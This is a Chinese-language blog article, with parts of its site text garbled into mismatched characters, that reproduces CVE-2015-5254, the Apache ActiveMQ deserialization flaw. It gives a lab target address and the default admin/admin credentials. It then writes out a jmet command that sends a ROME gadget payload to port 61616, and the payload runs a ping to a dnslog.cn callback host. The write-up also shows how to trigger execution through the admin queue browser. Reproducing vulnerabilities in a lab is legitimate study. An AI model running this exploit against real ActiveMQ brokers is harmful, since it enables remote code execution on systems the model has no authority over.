溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

ActiveMQ反序列化漏洞的CVE-2015-5254復(fù)現(xiàn)是怎樣的

發(fā)布時(shí)間:2021-12-29 17:37:58 來源:億速云 閱讀:297 作者:柒染 欄目:安全技術(shù)

本篇文章給大家分享的是有關(guān)ActiveMQ反序列化漏洞的CVE-2015-5254復(fù)現(xiàn)是怎樣的,小編覺得挺實(shí)用的,因此分享給大家學(xué)習(xí),希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

Apache ActiveMQ是美國阿帕奇(Apache)軟件基金會所研發(fā)的一套開源的消息中間件,它支持Java消息服務(wù),集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,該漏洞源于程序沒有限制可在代理中序列化的類。遠(yuǎn)程攻擊者可借助特制的序列化的Java消息服務(wù)(JMS)ObjectMessage對象利用該漏洞執(zhí)行任意代碼。

下面僅做漏洞復(fù)現(xiàn)記錄與實(shí)現(xiàn),利用流程如下:

一、漏洞環(huán)境信息

目標(biāo)鏈接:http://192.168.101.152:8161/

ActiveMQ反序列化漏洞的CVE-2015-5254復(fù)現(xiàn)是怎樣的

訪問activemq 查看是否部署成功

http://192.168.101.152:8161/admin/  默認(rèn)賬戶密碼(admin/admin)

二、漏洞利用

執(zhí)行命令

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "ping test.z7wb3x.dnslog.cn" -Yp ROME   192.168.101.152   61616

ActiveMQ反序列化漏洞的CVE-2015-5254復(fù)現(xiàn)是怎樣的

此時(shí)會給ActiveMQ添加一個(gè)事件隊(duì)列,通過訪問

http://192.168.101.152:8161/admin/browse.jsp?JMSDestination=event

可以查看到這個(gè)隊(duì)列

ActiveMQ反序列化漏洞的CVE-2015-5254復(fù)現(xiàn)是怎樣的

點(diǎn)擊后執(zhí)行命令

ActiveMQ反序列化漏洞的CVE-2015-5254復(fù)現(xiàn)是怎樣的

ActiveMQ反序列化漏洞的CVE-2015-5254復(fù)現(xiàn)是怎樣的

命令執(zhí)行成功

以上就是ActiveMQ反序列化漏洞的CVE-2015-5254復(fù)現(xiàn)是怎樣的,小編相信有部分知識點(diǎn)可能是我們?nèi)粘9ぷ鲿姷交蛴玫降?。希望你能通過這篇文章學(xué)到更多知識。更多詳情敬請關(guān)注億速云行業(yè)資訊頻道。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI